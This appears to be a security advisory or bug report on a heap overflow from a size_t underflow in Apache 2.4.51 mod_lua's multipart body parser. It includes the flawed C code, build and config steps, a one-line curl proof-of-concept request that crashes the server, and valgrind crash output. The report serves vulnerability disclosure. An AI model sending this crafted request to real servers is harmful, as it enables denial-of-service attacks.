9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.313 Low
EPSS
Percentile
96.3%
Ubuntu - 18.04 (32-bit)
Apache 2.4.51 (32-bit)
This bug is present in “req_parsebody” method of modules/lua/lua_request.c file.
Below mentioned lines of code cause this bug.
...
size_t vlen = 0;
...
...
vlen = end - crlf - 8;
buffer = (char *) apr_pcalloc(r->pool, vlen+1);
memcpy(buffer, crlf + 4, vlen);
...
Above code does not check whether the result of (end - crlf) is greater than or equal to 8.
So it is possible to make the result of (end - crlf - 8), negative.
Sending this HTTP request causes the result to be -1.
curl -v -X POST -H 'content-type: multipart/form-data; boundary=-' --data-binary $'-\r\n\r\naaa-' http://127.0.0.1/test.lua
Since “vlen” is of type “size_t”, -1 will become 4294967295. This is the maximum value of size_t data type in 32 bit systems.
Then vlen+1 is passed to apr_pcalloc method.
So the actual size allocated is 0.
Since the allocated buffer is too small there will be an overflow and crash in next memcpy statement.
Build Apache web server with Lua module
./configure --enable-lua=shared
make
make install
Enable Lua module with Apache web server.
Add these lines to httpd.conf file.
LoadModule lua_module modules/mod_lua.so
<Files "*.lua">
SetHandler lua-script
</Files>
Copy attached F1555487 file to htdocs folder.
Start Apache web server in debug single worker mode.
./httpd -X -d /home/apache/install-directory/
Send this HTTP request with CURL.
curl -v -X POST -H 'content-type: multipart/form-data; boundary=-' --data-binary $'-\r\n\r\naaa-' http://127.0.0.1/test.lua
Apache web server will crash.
Command: valgrind ./httpd -X -d /home/apache/install-directory/
Invalid write of size 1
at 0x483513B: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
by 0x501355B: req_parsebody (lua_request.c:415)
by 0x503628E: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5041A1F: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x50365E5: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5030D96: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5035C1A: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5036886: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5032556: lua_pcallk (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x500D02B: lua_handler (mod_lua.c:323)
by 0x15F9E4: ap_run_handler (config.c:169)
by 0x16040C: ap_invoke_handler (config.c:443)
Address 0x12aec000 is not stack’d, malloc’d or (recently) free’d
Process terminating with default action of signal 11 (SIGSEGV)
Access not within mapped region at address 0x12AEC000
at 0x483513B: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
by 0x501355B: req_parsebody (lua_request.c:415)
by 0x503628E: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5041A1F: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x50365E5: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5030D96: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5035C1A: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5036886: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5032556: lua_pcallk (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x500D02B: lua_handler (mod_lua.c:323)
by 0x15F9E4: ap_run_handler (config.c:169)
by 0x16040C: ap_invoke_handler (config.c:443)
May be possible to use in a denial of service attack.
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.313 Low
EPSS
Percentile
96.3%